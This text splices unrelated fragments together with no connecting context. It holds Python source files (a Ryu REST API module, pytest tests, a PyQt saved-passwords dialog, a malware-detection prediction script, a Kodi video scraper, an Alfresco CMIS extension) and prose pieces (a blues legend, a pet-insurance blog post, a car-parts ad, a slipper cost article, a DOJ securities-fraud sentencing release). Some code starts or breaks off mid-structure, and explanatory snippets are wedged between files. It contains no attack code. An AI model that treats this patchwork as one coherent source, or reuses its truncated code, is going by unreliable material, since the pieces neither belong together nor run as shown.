        'host_tracker': host_tracker.HostTracker
    }

    def __init__(self, *args, **kwargs):
        super(HostTrackerRestApi, self).__init__(*args, **kwargs)

        dpset = kwargs['dpset']
        wsgi = kwargs['wsgi']
        host_tracker = kwargs['host_tracker']

        self.data = {}
        self.data['dpset'] = dpset
        self.data['waiters'] = {}
        self.data['host_tracker'] = host_tracker

        wsgi.register(HostTrackerController, self.data)

        # mapper = wsgi.mapper
        # mapper.connect('hosts', '/v1.0/hosts', controller=HostTrackerController,
        #                action='get_all_hosts', conditions=dict(method=['GET']))
        # mapper.connect('hosts', '/v1.0/hosts/{dpid}', controller=HostTrackerController,
        #                action='get_hosts', conditions=dict(method=['GET']),
        #                requirements={'dpid': dpid_lib.DPID_PATTERN})
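A client for the two GET routes might look like the following sketch. The host and port are assumptions (Ryu's WSGI server conventionally listens on 8080), not something this module configures, so adjust `BASE` for your deployment:

```python
import json
from urllib.request import urlopen

# Assumed controller address; Ryu's wsgi server commonly listens on 8080.
BASE = "http://127.0.0.1:8080"


def hosts_url(dpid=None):
    # /v1.0/hosts lists every tracked host;
    # /v1.0/hosts/<dpid> filters to hosts attached to one switch.
    if dpid is None:
        return BASE + "/v1.0/hosts"
    return "{0}/v1.0/hosts/{1}".format(BASE, dpid)


def get_hosts(dpid=None):
    # Returns the decoded JSON body; an unknown dpid yields an HTTP 404 error.
    with urlopen(hosts_url(dpid)) as resp:
        return json.loads(resp.read().decode("utf-8"))
```

With the controller running, `get_hosts()` returns the full host table and `get_hosts(1)` only the hosts learned on datapath 1.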
According to a legend well known to modern blues fans, Robert Johnson was a young black man living on a plantation in rural Mississippi. Driven by a burning desire to become a great blues musician, he was instructed to take his guitar to a crossroad near Dockery's plantation at midnight. There he was met by a large black man (the Devil), who took the guitar from Johnson, tuned it, and handed it back in return for his soul. In exchange, Robert Johnson gained mastery of the instrument and the ability to play, sing, and create the greatest blues anyone had ever heard.
import pytest
import json
from mock import patch
from werkzeug.exceptions import BadRequest

from arrested import (
    Handler, Endpoint, ResponseHandler, RequestHandler,
    JSONRequestMixin, JSONResponseMixin)


def test_handler_params_set():
    endpoint = Endpoint()
    handler = Handler(endpoint, payload_key='foo', **{'test': 'foo'})

    assert handler.endpoint == endpoint
    assert handler.payload_key == 'foo'
    assert handler.params == {'test': 'foo'}


def test_handler_handle_method_basic():
    """By default the handle method simply returns the data passed to it."""
    endpoint = Endpoint()
    handler = Handler(endpoint)
    resp = handler.handle({'foo': 'bar'})

    assert resp == {'foo': 'bar'}


def test_handler_process_method_calls_handle():
    endpoint = Endpoint()
    handler = Handler(endpoint)
    with patch.object(Handler, 'handle') as _mock:
        handler.process({'foo': 'bar'})
        _mock.assert_called_once_with({'foo': 'bar'})


def test_handler_process_method_response():
    endpoint = Endpoint()
    handler = Handler(endpoint)
    resp = handler.process({'foo': 'bar'})

    assert resp == handler
    assert resp.data == {'foo': 'bar'}


def test_response_handler_handle_method(app):
    endpoint = Endpoint()
    handler = ResponseHandler(endpoint)
    with app.test_request_context('/test', method='GET'):
        resp = handler.process({'foo': 'bar'})

        assert resp == handler
        assert resp.data == {'foo': 'bar'}


def test_response_handler_get_response_data(app):
    endpoint = Endpoint()
    handler = ResponseHandler(endpoint)
    with app.test_request_context('/test', method='GET'):
        resp = handler.process({'foo': 'bar'})

        assert resp == handler
        assert resp.data == {'foo': 'bar'}


def test_request_handler_handle_method():
    endpoint = Endpoint()
    handler = RequestHandler(endpoint)
    # As we're passing data directly to process(), the get_request_data() method
    # will not be called, so the incoming data is not required to be in JSON format.
    resp = handler.process({'foo': 'bar'})

    assert resp == handler
    assert resp.data == {'foo': 'bar'}


def test_request_handler_handle_method_request_data(app):
    endpoint = Endpoint()
    handler = RequestHandler(endpoint)
    with app.test_request_context(
            '/test', data=json.dumps({'foo': 'bar'}),
            headers={'content-type': 'application/json'},
            method='POST'):
        resp = handler.process()

        assert resp == handler
        assert resp.data == {'foo': 'bar'}


def test_json_request_mixin_valid_json_request(app):
    mixin = JSONRequestMixin()
    with app.test_request_context(
            '/test', data=json.dumps({'foo': 'bar'}),
            headers={'content-type': 'application/json'},
            method='POST'):
        resp = mixin.get_request_data()
        assert resp == {'foo': 'bar'}


def test_json_request_mixin_invalid_json(app):
    endpoint = Endpoint()
    mixin = JSONRequestMixin()
    mixin.endpoint = endpoint
    with app.test_request_context(
            '/test', data=b'not valid',
            headers={'content-type': 'application/json'},
            method='POST'):
        with pytest.raises(BadRequest):
            mixin.get_request_data()


def test_json_response_mixin(app):
    mixin = JSONResponseMixin()
    mixin.payload_key = 'data'
    mixin.data = {'foo': 'bar'}

    assert mixin.get_response_data() == json.dumps({"data": {"foo": "bar"}})
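The contract these tests assert — `handle()` returns its input unchanged, while `process()` stores the handled data on the handler and returns the handler itself so calls can be chained — can be captured in a tiny stand-in. `MiniHandler` below is hypothetical, not arrested's actual implementation; it only mirrors the behaviour the tests above check:

```python
class MiniHandler:
    """Hypothetical stand-in mirroring the contract the tests assert."""

    def __init__(self, endpoint, payload_key=None, **params):
        self.endpoint = endpoint
        self.payload_key = payload_key
        self.params = params
        self.data = None

    def handle(self, data):
        # Default behaviour: pass the data through untouched.
        return data

    def process(self, data=None):
        # Store the handled data and return self, enabling chained access
        # like handler.process(payload).data.
        self.data = self.handle(data)
        return self


h = MiniHandler(endpoint=object(), payload_key='foo', test='foo')
result = h.process({'foo': 'bar'})
```

After the call, `result is h` and `result.data == {'foo': 'bar'}`, which is exactly what `test_handler_process_method_response` verifies against the real class.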
Emerald Life was at the Victoria Park Dog Show recently, organised by All About Dogs. It was great to see so many dog-owners and wannabe dog-owners having fun, chatting and watching the shows and competitions. The dogs were just as friendly as their owners, and with dozens of dogs running around, the atmosphere was great. One dog in particular caught my eye, or rather one collar. When we own dogs, it is important that we signal to strangers how friendly (or not) our dog is. The rule is that it is always best to ask an owner first whether you can pet their dog, and that is an important lesson for children to learn and understand rather than barrelling towards a dog that may be nervous. Many of you will know that a yellow collar on a dog means ‘nervous’, although the better collars have that written on them. This weekend was the first time that I have seen a green ‘friendly’ collar. I spoke to the owners about this lovely little chap Monty. He is a rescue dog and could not have been more eager to make new friends. The reason for a green collar is that many people get nervous around certain breeds with a perceived bad reputation, like Staffordshire Bull Terriers (such as Monty), Bull Terriers, Dobermans etc., all of which can be sweet and loving dogs in the right homes. Lots of people don’t want to come over and say hello to such a dog, which is itself a shame, and the dog can feel unsettled by the nervous vibe being given out. But no dog is sweet and lovely all the time. What do you do when your dog bites or causes damage? It can happen to even the best-trained dogs when they are tired or provoked. If your dog runs off and causes a car accident, the bill can run to thousands, and even more if medical treatment is required. By law (under various pieces of legislation) an owner may be liable for the actions of their dog (cats are not covered!) if the dog is ‘out of control’, which can be broadly interpreted. We all know our dogs – and sometimes they do things they shouldn’t.
You can’t change that, but you can insure against it. A good dog policy should include a decent level of third party cover; the Emerald Life pet policy has third party liability cover of up to £1,000,000 per event, covering both property damage and injury or death. As a responsible dog owner, you should make sure your pet policy includes a suitable level of third party liability cover for you and your dog. If yours doesn’t, or if you fancy a price check, you can check out Emerald’s pet policy here. We all love our dogs, and it’s good to have that extra peace of mind.
# -*- coding: utf-8 -*-

# Copyright (c) 2009 - 2015 Detlev Offenbach <detlev@die-offenbachs.de>
#

"""
Module implementing a dialog to show all saved logins.
"""

from __future__ import unicode_literals

from PyQt5.QtCore import pyqtSlot, QSortFilterProxyModel
from PyQt5.QtGui import QFont, QFontMetrics
from PyQt5.QtWidgets import QDialog

from E5Gui import E5MessageBox

from .Ui_PasswordsDialog import Ui_PasswordsDialog


class PasswordsDialog(QDialog, Ui_PasswordsDialog):
    """
    Class implementing a dialog to show all saved logins.
    """
    def __init__(self, parent=None):
        """
        Constructor

        @param parent reference to the parent widget (QWidget)
        """
        super(PasswordsDialog, self).__init__(parent)
        self.setupUi(self)

        self.__showPasswordsText = self.tr("Show Passwords")
        self.__hidePasswordsText = self.tr("Hide Passwords")
        self.passwordsButton.setText(self.__showPasswordsText)

        self.removeButton.clicked.connect(
            self.passwordsTable.removeSelected)
        self.removeAllButton.clicked.connect(self.passwordsTable.removeAll)

        import Helpviewer.HelpWindow
        from .PasswordModel import PasswordModel

        self.passwordsTable.verticalHeader().hide()
        self.__passwordModel = PasswordModel(
            Helpviewer.HelpWindow.HelpWindow.passwordManager(), self)
        self.__proxyModel = QSortFilterProxyModel(self)
        self.__proxyModel.setSourceModel(self.__passwordModel)
        self.searchEdit.textChanged.connect(
            self.__proxyModel.setFilterFixedString)
        self.passwordsTable.setModel(self.__proxyModel)

        fm = QFontMetrics(QFont())
        height = fm.height() + fm.height() // 3
        self.passwordsTable.verticalHeader().setDefaultSectionSize(height)
        self.passwordsTable.verticalHeader().setMinimumSectionSize(-1)

        self.__calculateHeaderSizes()

    def __calculateHeaderSizes(self):
        """
        Private method to calculate the section sizes of the horizontal
        header.
        """
        fm = QFontMetrics(QFont())
        for section in range(self.__passwordModel.columnCount()):
            header = self.passwordsTable.horizontalHeader()\
                .sectionSizeHint(section)
            if section == 0:
                header = fm.width("averagebiglongsitename")
            elif section == 1:
                header = fm.width("averagelongusername")
            elif section == 2:
                header = fm.width("averagelongpassword")
            buffer = fm.width("mm")
            header += buffer
            self.passwordsTable.horizontalHeader()\
                .resizeSection(section, header)
        self.passwordsTable.horizontalHeader().setStretchLastSection(True)

    @pyqtSlot()
    def on_passwordsButton_clicked(self):
        """
        Private slot to switch the password display mode.
        """
        if self.__passwordModel.showPasswords():
            self.__passwordModel.setShowPasswords(False)
            self.passwordsButton.setText(self.__showPasswordsText)
        else:
            res = E5MessageBox.yesNo(
                self,
                self.tr("Saved Passwords"),
                self.tr("""Do you really want to show passwords?"""))
            if res:
                self.__passwordModel.setShowPasswords(True)
                self.passwordsButton.setText(self.__hidePasswordsText)
        self.__calculateHeaderSizes()
aFe Control Sway Bars for the 2017-2018 Honda Civic Type-R I4-2.0L (t) provide the perfect balance front to rear, offering increased roll stiffness without upsetting the vehicle’s balance or traction control. Designed specifically for the Civic Type-R, these lightweight tubular sway bars will transform your Type-R’s handling and inspire driving confidence, keeping the car flatter and more neutral in any corner. The 1.25" non-adjustable front and 1.00" 2-way adjustable rear bars are constructed from lightweight tubular steel and include polyurethane bushings and greaseable billet brackets for the rear. For years of durability and great looks, the bars are powder-coated in a special 2-stage tangerine orange. Perfectly balanced, aFe Control sway bars will have your Civic Type-R handling just as well at the track as around town.
# -*- coding: utf-8 -*-
"""
Created on Fri Mar  1 23:05:32 2019

@author: gtesei
"""

import pandas as pd
import numpy as np
import lightgbm as lgb
#import xgboost as xgb
from scipy.sparse import vstack, csr_matrix, save_npz, load_npz
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from sklearn.model_selection import StratifiedKFold
#from sklearn.metrics import roc_auc_score
import gc

gc.enable()

dtypes = {
    'MachineIdentifier': 'category',
    'ProductName': 'category',
    'EngineVersion': 'category',
    'AppVersion': 'category',
    'AvSigVersion': 'category',
    'IsBeta': 'int8',
    'RtpStateBitfield': 'float16',
    'IsSxsPassiveMode': 'int8',
    'DefaultBrowsersIdentifier': 'float16',
    'AVProductStatesIdentifier': 'float32',
    'AVProductsInstalled': 'float16',
    'AVProductsEnabled': 'float16',
    'HasTpm': 'int8',
    'CountryIdentifier': 'int16',
    'CityIdentifier': 'float32',
    'OrganizationIdentifier': 'float16',
    'GeoNameIdentifier': 'float16',
    'LocaleEnglishNameIdentifier': 'int8',
    'Platform': 'category',
    'Processor': 'category',
    'OsVer': 'category',
    'OsBuild': 'int16',
    'OsSuite': 'int16',
    'OsPlatformSubRelease': 'category',
    'OsBuildLab': 'category',
    'SkuEdition': 'category',
    'IsProtected': 'float16',
    'AutoSampleOptIn': 'int8',
    'PuaMode': 'category',
    'SMode': 'float16',
    'IeVerIdentifier': 'float16',
    'SmartScreen': 'category',
    'Firewall': 'float16',
    'UacLuaenable': 'float32',
    'Census_MDC2FormFactor': 'category',
    'Census_DeviceFamily': 'category',
    'Census_OEMNameIdentifier': 'float16',
    'Census_OEMModelIdentifier': 'float32',
    'Census_ProcessorCoreCount': 'float16',
    'Census_ProcessorManufacturerIdentifier': 'float16',
    'Census_ProcessorModelIdentifier': 'float16',
    'Census_ProcessorClass': 'category',
    'Census_PrimaryDiskTotalCapacity': 'float32',
    'Census_PrimaryDiskTypeName': 'category',
    'Census_SystemVolumeTotalCapacity': 'float32',
    'Census_HasOpticalDiskDrive': 'int8',
    'Census_TotalPhysicalRAM': 'float32',
    'Census_ChassisTypeName': 'category',
    'Census_InternalPrimaryDiagonalDisplaySizeInInches': 'float16',
    'Census_InternalPrimaryDisplayResolutionHorizontal': 'float16',
    'Census_InternalPrimaryDisplayResolutionVertical': 'float16',
    'Census_PowerPlatformRoleName': 'category',
    'Census_InternalBatteryType': 'category',
    'Census_InternalBatteryNumberOfCharges': 'float32',
    'Census_OSVersion': 'category',
    'Census_OSArchitecture': 'category',
    'Census_OSBranch': 'category',
    'Census_OSBuildNumber': 'int16',
    'Census_OSBuildRevision': 'int32',
    'Census_OSEdition': 'category',
    'Census_OSSkuName': 'category',
    'Census_OSInstallTypeName': 'category',
    'Census_OSInstallLanguageIdentifier': 'float16',
    'Census_OSUILocaleIdentifier': 'int16',
    'Census_OSWUAutoUpdateOptionsName': 'category',
    'Census_IsPortableOperatingSystem': 'int8',
    'Census_GenuineStateName': 'category',
    'Census_ActivationChannel': 'category',
    'Census_IsFlightingInternal': 'float16',
    'Census_IsFlightsDisabled': 'float16',
    'Census_FlightRing': 'category',
    'Census_ThresholdOptIn': 'float16',
    'Census_FirmwareManufacturerIdentifier': 'float16',
    'Census_FirmwareVersionIdentifier': 'float32',
    'Census_IsSecureBootEnabled': 'int8',
    'Census_IsWIMBootEnabled': 'float16',
    'Census_IsVirtualDevice': 'float16',
    'Census_IsTouchEnabled': 'int8',
    'Census_IsPenCapable': 'int8',
    'Census_IsAlwaysOnAlwaysConnectedCapable': 'float16',
    'Wdft_IsGamer': 'float16',
    'Wdft_RegionIdentifier': 'float16',
    'HasDetections': 'int8'
}

print('Download Train and Test Data.\n')
train = pd.read_csv('data/train.csv', dtype=dtypes, low_memory=True)
train['MachineIdentifier'] = train.index.astype('uint32')
test = pd.read_csv('data/test.csv', dtype=dtypes, low_memory=True)
test['MachineIdentifier'] = test.index.astype('uint32')
gc.collect()

print('Transform all features to category.\n')
for usecol in train.columns.tolist()[1:-1]:
    train[usecol] = train[usecol].astype('str')
    test[usecol] = test[usecol].astype('str')

    # Fit LabelEncoder
    le = LabelEncoder().fit(
        np.unique(train[usecol].unique().tolist() +
                  test[usecol].unique().tolist()))

    # At the end 0 will be used for dropped values
    train[usecol] = le.transform(train[usecol]) + 1
    test[usecol] = le.transform(test[usecol]) + 1

    agg_tr = (train
              .groupby([usecol])
              .aggregate({'MachineIdentifier': 'count'})
              .reset_index()
              .rename({'MachineIdentifier': 'Train'}, axis=1))
    agg_te = (test
              .groupby([usecol])
              .aggregate({'MachineIdentifier': 'count'})
              .reset_index()
              .rename({'MachineIdentifier': 'Test'}, axis=1))

    agg = pd.merge(agg_tr, agg_te, on=usecol, how='outer').replace(np.nan, 0)
    # Select values with more than 1000 observations
    agg = agg[(agg['Train'] > 1000)].reset_index(drop=True)
    agg['Total'] = agg['Train'] + agg['Test']
    # Drop unbalanced values
    agg = agg[(agg['Train'] / agg['Total'] > 0.2) &
              (agg['Train'] / agg['Total'] < 0.8)]
    agg[usecol + 'Copy'] = agg[usecol]

    train[usecol] = (pd.merge(train[[usecol]],
                              agg[[usecol, usecol + 'Copy']],
                              on=usecol, how='left')[usecol + 'Copy']
                     .replace(np.nan, 0).astype('int').astype('category'))
    test[usecol] = (pd.merge(test[[usecol]],
                             agg[[usecol, usecol + 'Copy']],
                             on=usecol, how='left')[usecol + 'Copy']
                    .replace(np.nan, 0).astype('int').astype('category'))

    del le, agg_tr, agg_te, agg, usecol
    gc.collect()
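To make the shared-encoder trick above concrete, here is a tiny self-contained sketch (toy values, not the competition data): a single LabelEncoder is fit on the union of train and test values so both splits share one code space, and the codes are shifted by +1 so that 0 remains free for the categories dropped later.

```python
import numpy as np
from sklearn.preprocessing import LabelEncoder

# Hypothetical stand-ins for a single categorical column
train_vals = ['on', 'off', 'on', 'warn']
test_vals = ['off', 'prompt', 'on']

# One encoder over the union, so train and test get consistent codes
le = LabelEncoder().fit(np.unique(train_vals + test_vals))

# +1 keeps 0 available as the "dropped/unknown" bucket
train_codes = le.transform(train_vals) + 1
test_codes = le.transform(test_vals) + 1

print([str(c) for c in le.classes_])  # ['off', 'on', 'prompt', 'warn']
print(train_codes.tolist())           # [2, 1, 2, 4]
print(test_codes.tolist())            # [1, 3, 2]
```

Fitting on the union matters: an encoder fit on train alone would raise on `'prompt'`, which occurs only in test.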
Fashion Math: Would You Let $80 Slip From Your Wallet for a Pair of Slippers? The beauty of these slippers is that you can wear them indoors year-round. Wear these slippers at home every night for a year and they will cost you about 22 cents a night ($80 ÷ 365 wears), less than a piece of bubble gum from a machine. Check out our UGGs guide for more UGGs we love, plus cozy leggings to keep you warm all winter long, and see more Fashion Math equations.
# -*- coding: utf-8 -*-
from resources.lib import utils
import re

title = ['RTBF Auvio']
img = ['rtbf']
readyForUse = True

url_root = 'http://www.rtbf.be/auvio'

categories = {
    '/categorie/series?id=35': 'Séries',
    '/categorie/sport?id=9': 'Sport',
    '/categorie/divertissement?id=29': 'Divertissement',
    '/categorie/culture?id=18': 'Culture',
    '/categorie/films?id=36': 'Films',
    '/categorie/sport/football?id=11': 'Football',
    '/categorie/vie-quotidienne?id=44': 'Vie quotidienne',
    '/categorie/musique?id=23': 'Musique',
    '/categorie/info?id=1': 'Info',
    '/categorie/humour?id=40': 'Humour',
    '/categorie/documentaires?id=31': 'Documentaires',
    '/categorie/enfants?id=32': 'Enfants'
}


def list_shows(channel, param):
    shows = []
    if param == 'none':
        for url, title in categories.iteritems():
            shows.append([channel, url, title, '', 'shows'])
    return shows


def list_videos(channel, cat_url):
    videos = []
    cat = cat_url[2:]
    filePath = utils.downloadCatalog(url_root + cat_url,
                                     'rtbf' + cat + '.html', False, {})
    html = open(filePath).read().replace('\xe9', 'e').replace('\xe0', 'a') \
        .replace('\n', ' ').replace('\r', '')
    match = re.compile(
        r'<h3 class="rtbf-media-item__title "><a href="(.*?)" title="(.*?)">',
        re.DOTALL).findall(html)
    for url, title in match:
        title = utils.formatName(title)
        infoLabels = {"Title": title}
        videos.append([channel, url, title, '', infoLabels, 'play'])
    return videos


def getVideoURL(channel, url_video):
    html = utils.get_webcontent(url_video).replace('\xe9', 'e') \
        .replace('\xe0', 'a').replace('\n', ' ').replace('\r', '')
    url = re.findall(r'<meta property="og:video" content="(.*?).mp4"', html)[0]
    return url + '.mp4'
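As a quick sanity check of the scraping pattern in `list_videos`, here is a standalone snippet (with a made-up HTML fragment, not real RTBF markup) showing how the `rtbf-media-item__title` regex pulls out URL/title pairs:

```python
import re

# Hypothetical fragment shaped like what the regex above expects
html = ('<h3 class="rtbf-media-item__title ">'
        '<a href="/auvio/detail?id=123" title="Le Journal"></a></h3>')

pattern = re.compile(
    r'<h3 class="rtbf-media-item__title "><a href="(.*?)" title="(.*?)">',
    re.DOTALL)

print(pattern.findall(html))  # [('/auvio/detail?id=123', 'Le Journal')]
```

The non-greedy `(.*?)` groups stop at the first closing quote, so each `<h3>` block yields exactly one `(href, title)` tuple.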
WASHINGTON—The former chief executive officer (CEO) of ArthroCare Corporation was sentenced to serve 20 years in prison, and the former chief financial officer (CFO) was sentenced to serve 10 years in prison today for their leading roles in a $750 million securities fraud scheme. Two other former senior vice presidents of ArthroCare were also sentenced to prison terms for their roles in the scheme. Principal Deputy Assistant Attorney General Marshall L. Miller of the Department of Justice’s Criminal Division and Special Agent in Charge Christopher H. Combs of the FBI’s San Antonio Field Office made the announcement. U.S. District Judge Sam Sparks in the Western District of Texas imposed the sentences. On June 2, 2014, ArthroCare’s former CEO Michael Baker, 55, and former CFO Michael Gluk, 56, were convicted by a jury of wire fraud, securities fraud, and conspiracy to commit wire and securities fraud; Baker was also convicted of making false statements. On June 24, 2013, John Raffle, 46, the former Vice President of Strategic Business Units, pleaded guilty to conspiracy to commit securities, mail and wire fraud, and two false statements charges. On May 9, 2013, David Applegate, 55, the former Senior Vice President of the Spine Division, pleaded guilty to conspiracy to commit securities, mail and wire fraud, and a false statements charge. At sentencing, the court found that investors lost approximately $756 million as a result of the defendants’ scheme to artificially inflate the share price of ArthroCare stock through sham transactions. According to court documents, between 2005 and 2009, Baker, Gluk, Raffle and Applegate executed a scheme to artificially inflate sales and revenue through a series of end-of-quarter transactions involving several of ArthroCare’s distributors. Products were shipped to distributors at quarter end based on ArthroCare’s need to meet Wall Street analyst forecasts, rather than distributors’ actual orders.
ArthroCare then fraudulently reported these shipments as sales in its quarterly and annual filings at the time of the shipment, enabling the company to appear to meet or exceed internal and external earnings forecasts. ArthroCare’s distributors agreed to accept these shipments of millions of dollars of excess inventory in exchange for lucrative concessions from ArthroCare, such as upfront cash commissions, extended payment terms, and the ability to return products. In some cases, like that of ArthroCare’s largest distributor, DiscoCare, the defendants agreed ArthroCare would acquire the distributor and the inventory so that the distributor would not have to pay ArthroCare for the products at all. Between December 2005 and February 2009, ArthroCare’s shareholders held more than 25 million shares of ArthroCare stock. On July 21, 2008, after ArthroCare announced publicly that it would be restating its previously reported financial results to reflect the results of an internal investigation and account for the defendants’ fraud, the price of ArthroCare shares dropped from $40.03 to $23.21 per share. On Dec. 19, 2008, ArthroCare again announced publicly that it had identified more accounting errors and possible irregularities related to the defendants’ fraud. That day, the price of ArthroCare shares dropped from approximately $16.23 to approximately $5.92 per share. In addition to the underlying conduct, Baker was convicted of lying to the U.S. Securities and Exchange Commission during its investigation of the conduct. The court further found, as part of sentencing, that Baker and Gluk each lied under oath during their trial testimony, in which they attempted to escape responsibility for their actions. In addition to their prison terms, Baker and Gluk were sentenced to serve five years of supervised release. In addition, the court ordered Gluk and Baker to forfeit $25,040,810, the amount of their profits from the scheme.
John Raffle was sentenced to serve 80 months in prison followed by three years of supervised release. David Applegate was sentenced to serve 60 months in prison followed by three years of supervised release. The case was investigated by the FBI’s San Antonio Field Office. The case was prosecuted by Deputy Chief Benjamin D. Singer and Trial Attorneys Henry P. Van Dyck and William S.W. Chang of the Criminal Division’s Fraud Section. The Department recognizes the substantial assistance of the Criminal Division’s Asset Forfeiture and Money Laundering Section and the U.S. Securities and Exchange Commission, as well as the critical role of the U.S. Attorney’s Office for the Western District of Texas, which provided invaluable support to the prosecution team during all phases of the litigation.
#
#      Licensed to the Apache Software Foundation (ASF) under one
#      or more contributor license agreements.  See the NOTICE file
#      distributed with this work for additional information
#      regarding copyright ownership.  The ASF licenses this file
#      to you under the Apache License, Version 2.0 (the
#      "License"); you may not use this file except in compliance
#      with the License.  You may obtain a copy of the License at
#
#        http://www.apache.org/licenses/LICENSE-2.0
#
#      Unless required by applicable law or agreed to in writing,
#      software distributed under the License is distributed on an
#      "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#      KIND, either express or implied.  See the License for the
#      specific language governing permissions and limitations
#      under the License.
#
from ..cmislib import model
from ..cmislib.exceptions import InvalidArgumentException

import datetime

ALFRESCO_NS = 'http://www.alfresco.org'
ALFRESCO_NSALIAS = 'alf'
ALFRESCO_NSALIAS_DECL = 'xmlns:' + ALFRESCO_NSALIAS
ALFRESCO_NSPREFIX = ALFRESCO_NSALIAS + ':'

LOCALNAME_ASPECTS = 'aspects'
LOCALNAME_PROPERTIES = 'properties'
LOCALNAME_APPLIED_ASPECTS = 'appliedAspects'
LOCALNAME_SET_ASPECTS = 'setAspects'
LOCALNAME_ASPECTS_TO_ADD = 'aspectsToAdd'
LOCALNAME_ASPECTS_TO_REMOVE = 'aspectsToRemove'

TAGNAME_ALFRESCO_PROPERTIES = ALFRESCO_NSPREFIX + LOCALNAME_PROPERTIES
TAGNAME_SET_ASPECTS = ALFRESCO_NSPREFIX + LOCALNAME_SET_ASPECTS
TAGNAME_ASPECTS_TO_ADD = ALFRESCO_NSPREFIX + LOCALNAME_ASPECTS_TO_ADD
TAGNAME_ASPECTS_TO_REMOVE = ALFRESCO_NSPREFIX + LOCALNAME_ASPECTS_TO_REMOVE

OBJECT_TYPE_ID = 'cmis:objectTypeId'
CHANGE_TOKEN = 'cmis:changeToken'


def addSetAspectsToXMLDocument(xmldoc):
    entryElements = xmldoc.getElementsByTagNameNS(model.ATOM_NS, 'entry')
    entryElements[0].setAttribute(ALFRESCO_NSALIAS_DECL, ALFRESCO_NS)
    propertiesElements = xmldoc.getElementsByTagNameNS(model.CMIS_NS,
                                                       LOCALNAME_PROPERTIES)
    if len(propertiesElements) == 0:
        objectElement = xmldoc.getElementsByTagNameNS(model.CMISRA_NS,
                                                      'object')
        propertiesElement = xmldoc.createElementNS(model.CMIS_NS,
                                                   'cmis:properties')
        objectElement[0].appendChild(propertiesElement)
    else:
        propertiesElement = propertiesElements[0]
    aspectsElement = xmldoc.createElementNS(ALFRESCO_NS, TAGNAME_SET_ASPECTS)
    propertiesElement.appendChild(aspectsElement)
    return aspectsElement


def addPropertiesToXMLElement(xmldoc, element, properties):
    for propName, propValue in properties.items():
        # the name of the element here is significant: it includes the data
        # type. I should be able to figure out the right type based on the
        # actual type of the object passed in. I could do a lookup to the
        # type definition, but that doesn't seem worth the performance hit
        propType = type(propValue)
        isList = False
        if (propType == list):
            propType = type(propValue[0])
            isList = True

        if (propType == model.CmisId):
            propElementName = 'cmis:propertyId'
            if isList:
                propValueStrList = []
                for val in propValue:
                    propValueStrList.append(val)
            else:
                propValueStrList = [propValue]
        elif (propType == str):
            propElementName = 'cmis:propertyString'
            if isList:
                propValueStrList = []
                for val in propValue:
                    propValueStrList.append(val)
            else:
                propValueStrList = [propValue]
        elif (propType == datetime.datetime):
            propElementName = 'cmis:propertyDateTime'
            if isList:
                propValueStrList = []
                for val in propValue:
                    propValueStrList.append(val.isoformat())
            else:
                propValueStrList = [propValue.isoformat()]
        elif (propType == bool):
            propElementName = 'cmis:propertyBoolean'
            if isList:
                propValueStrList = []
                for val in propValue:
                    propValueStrList.append(unicode(val).lower())
            else:
                propValueStrList = [unicode(propValue).lower()]
        elif (propType == int):
            propElementName = 'cmis:propertyInteger'
            if isList:
                propValueStrList = []
                for val in propValue:
                    propValueStrList.append(unicode(val))
            else:
                propValueStrList = [unicode(propValue)]
        elif (propType == float):
            propElementName = 'cmis:propertyDecimal'
            if isList:
                propValueStrList = []
                for val in propValue:
                    propValueStrList.append(unicode(val))
            else:
                propValueStrList = [unicode(propValue)]
        else:
            propElementName = 'cmis:propertyString'
            if isList:
                propValueStrList = []
                for val in propValue:
                    propValueStrList.append(unicode(val))
            else:
                propValueStrList = [unicode(propValue)]

        propElement = xmldoc.createElementNS(model.CMIS_NS, propElementName)
        propElement.setAttribute('propertyDefinitionId', propName)
        for val in propValueStrList:
            valElement = xmldoc.createElementNS(model.CMIS_NS, 'cmis:value')
            valText = xmldoc.createTextNode(val)
            valElement.appendChild(valText)
            propElement.appendChild(valElement)
        element.appendChild(propElement)


def initData(self):
    model.CmisObject._initData(self)
    self._aspects = {}
    self._alfproperties = {}


def findAlfrescoExtensions(self):
    if not hasattr(self, '_aspects'):
        self._aspects = {}
    if self._aspects == {}:
        if self.xmlDoc == None:
            self.reload()
        appliedAspects = self.xmlDoc.getElementsByTagNameNS(
            ALFRESCO_NS, LOCALNAME_APPLIED_ASPECTS)
        for node in appliedAspects:
            aspectType = self._repository.getTypeDefinition(
                node.childNodes[0].data)
            self._aspects[node.childNodes[0].data] = aspectType


def hasAspect(self, arg):
    result = False
    if arg is not None:
        self._findAlfrescoExtensions()
        if isinstance(arg, model.ObjectType):
            result = arg.getTypeId() in self._aspects
        else:
            result = arg in self._aspects
    return result


def getAspects(self):
    self._findAlfrescoExtensions()
    return self._aspects.values()


def findAspect(self, propertyId):
    self._findAlfrescoExtensions()
    if (propertyId is not None) and (len(self._aspects) > 0):
        for id, aspect in self._aspects.iteritems():
            props = aspect.getProperties()
            if propertyId in props:
                return aspect
    return None


def updateAspects(self, addAspects=None, removeAspects=None):
    if addAspects or removeAspects:
        selfUrl = self._getSelfLink()
        xmlEntryDoc = getEntryXmlDoc(self._repository)

        # Patch xmlEntryDoc
        setAspectsElement = addSetAspectsToXMLDocument(xmlEntryDoc)

        if addAspects:
            addAspectElement = xmlEntryDoc.createElementNS(
                ALFRESCO_NS, TAGNAME_ASPECTS_TO_ADD)
            valText = xmlEntryDoc.createTextNode(addAspects)
            addAspectElement.appendChild(valText)
            setAspectsElement.appendChild(addAspectElement)

        if removeAspects:
            removeAspectElement = xmlEntryDoc.createElementNS(
                ALFRESCO_NS, TAGNAME_ASPECTS_TO_REMOVE)
            valText = xmlEntryDoc.createTextNode(removeAspects)
            removeAspectElement.appendChild(valText)
            setAspectsElement.appendChild(removeAspectElement)

        updatedXmlDoc = self._cmisClient.put(
            selfUrl.encode('utf-8'),
            xmlEntryDoc.toxml(encoding='utf-8'),
            model.ATOM_XML_TYPE)
        self.xmlDoc = updatedXmlDoc
        self._initData()


def getProperties(self):
    result = model.CmisObject.getProperties(self)
    if not hasattr(self, '_alfproperties'):
        self._alfproperties = {}
    if self._alfproperties == {}:
        alfpropertiesElements = self.xmlDoc.getElementsByTagNameNS(
            ALFRESCO_NS, LOCALNAME_PROPERTIES)
        if len(alfpropertiesElements) > 0:
            for alfpropertiesElement in alfpropertiesElements:
                for node in [e for e in alfpropertiesElement.childNodes
                             if e.nodeType == e.ELEMENT_NODE and
                             e.namespaceURI == model.CMIS_NS]:
                    # propertyId, propertyString, propertyDateTime
                    # propertyType = cpattern.search(node.localName).groups()[0]
